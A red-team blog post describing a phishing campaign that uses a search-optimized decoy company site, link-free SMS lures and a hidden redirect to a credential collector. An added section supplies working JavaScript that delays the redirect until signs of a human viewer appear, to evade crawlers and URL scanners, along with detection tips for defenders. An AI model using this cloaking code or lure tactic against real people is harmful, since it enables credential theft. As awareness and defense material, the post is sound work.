If the Phish Won’t Go to You, You Can Surely Come to the Phish
Phishing is an age-old cyber-threat, and over the years businesses have invested substantially in building effective defenses against it. The war against phishing is waged on several fronts: emails hitting employees' mailboxes are parsed by mail security products, web browsing is filtered by increasingly capable technologies, and user education never stops. Even mobile phone operators now look for HTTP links in text messages and run spam analysis on them. From email to text messages, organizations have keenly adapted to the shape-shifting nature of phishing, employing sophisticated methods to fend off attempts to compromise them.
However, adversaries evolve in step with standard defense mechanisms. We have recently used a new approach to phishing on a customer engagement, but it would be naïve to think that it is not also used by real-life attackers elsewhere. The attack harnesses an inherent human trait, curiosity, but in a novel way.
This time, the modus operandi subverts the conventional phishing playbook. We did make a couple of more conventional, "run-of-the-mill" phishing attempts on this engagement, but all of them were blocked, either by technology or by highly trained users who reported the phish. So we decided to do something different. Rather than go after the targets with forceful phishing attempts, we used a "come to us" strategy: instead of reaching out, we left a breadcrumb trail for our targets to follow.
The cornerstone of this strategy is a decoy: a seemingly legitimate company with a carefully curated digital presence. Once set up, this entity is ready to ensnare unsuspecting victims. The decoy's main page carries a time-delayed redirect in its client-side HTML that only fires under certain conditions, so that automated crawlers and URL scanners do not discover it. Once triggered, the victim is sent to the credential collector page, but from a website they navigated to themselves, and therefore one they already have an inherent level of trust in. It is notable that this seems to work effectively even though the redirection points at a site that could be recognized as phishing, possibly because employees are used to seeing corporate login prompts fairly often (e.g. for web proxy access).
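To make the gating concrete, here is an added example of what such a conditional, time-delayed client-side redirect looks like. This is illustrative code written for this page, not the script used on the engagement, and the post only says the redirect was time-delayed and fired "under certain conditions". The specific conditions chosen here (tab visible, no `navigator.webdriver` automation flag, at least one real pointer/scroll/key event, a minimum dwell time), the dwell threshold and the target URL are all assumptions. The decision is kept in a pure function so it can be reasoned about and unit-tested without a browser; the browser wiring is only armed when `window` exists.

```javascript
// Added example, not the original post's code. Gates a client-side
// redirect on a minimum dwell time plus signs of a human viewer, so that
// a crawler that fetches the page once and leaves never sees the hop.
// The gating conditions, the threshold and the target are assumptions
// chosen for illustration.

const REDIRECT_TARGET = "https://login.example.invalid/"; // placeholder target
const MIN_DWELL_MS = 8000;                                // assumed dwell threshold

// Pure decision function: `signals` is what the page has observed so far,
// `elapsedMs` is how long the page has been open.
function shouldRedirect(signals, elapsedMs) {
  if (elapsedMs < MIN_DWELL_MS) return false;   // too early: crawlers rarely linger
  if (!signals.visible) return false;           // hidden tab or background render
  if (signals.webdriver) return false;          // browser automation flag is set
  if (signals.interactions < 1) return false;   // no pointer/scroll/key activity yet
  return true;
}

// Collects the signals from a (possibly fake) window/document and polls the
// decision every `pollMs`. `now` is injectable so the timing can be tested.
function armRedirect(win, doc, target, pollMs, now = Date.now) {
  const signals = {
    visible: !doc.hidden,
    webdriver: Boolean(win.navigator && win.navigator.webdriver),
    interactions: 0,
  };
  const start = now();
  const bump = () => { signals.interactions += 1; };
  ["pointermove", "scroll", "keydown", "touchstart"].forEach((ev) =>
    win.addEventListener(ev, bump, { passive: true })
  );
  doc.addEventListener("visibilitychange", () => { signals.visible = !doc.hidden; });

  const timer = win.setInterval(() => {
    if (shouldRedirect(signals, now() - start)) {
      win.clearInterval(timer);
      // replace() rather than assign(): the decoy page does not stay in
      // the history stack, so "back" does not return the victim to it.
      win.location.replace(target);
    }
  }, pollMs);
  return signals; // exposed so a harness can inspect the collected state
}

// Browser wiring; skipped under Node so the logic above can be tested.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  armRedirect(window, document, REDIRECT_TARGET, 1000);
}
```

The same logic tells a defender what a URL scanner must do to see the hop: render the page in a real browser context, keep the tab visible, dispatch synthetic pointer or scroll events, and wait past a plausible dwell time before declaring the page benign. A page whose only navigation is a delayed `location.replace()` to a different origin, with no user click, is itself a useful detection signal.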
The bait for this trap is a blend of intrigue and plausibility. We sent our targets text messages designed to pique their interest: a simple question that, importantly, contained no direct links, only a brief mention of the decoy company. Omitting the link was a psychological nudge for the recipients to look our decoy "company" up online. This turns a fundamental "cyber hygiene" practice against the user: the advice to navigate to websites manually instead of clicking links in unsolicited messages.
To ensure that the bait would reach the targets, the fake company's website was search engine-optimized (for instance, the fake business had a fairly unique name), making it a prominent fixture at the top of the relevant search results.
The campaign yielded a rate of engagement that was significantly higher than what we expected, turning casual searches into a number of successful phishing instances.
This phishing approach circumvents established cyber defenses by tapping into natural curiosity, undermining technological safeguards without directly confronting them, and underscores the fact that no protection measure is entirely foolproof. It is yet another reminder that while technology forms the first line of defense, continually educating users on recognizing and reporting new forms of subterfuge is equally critical.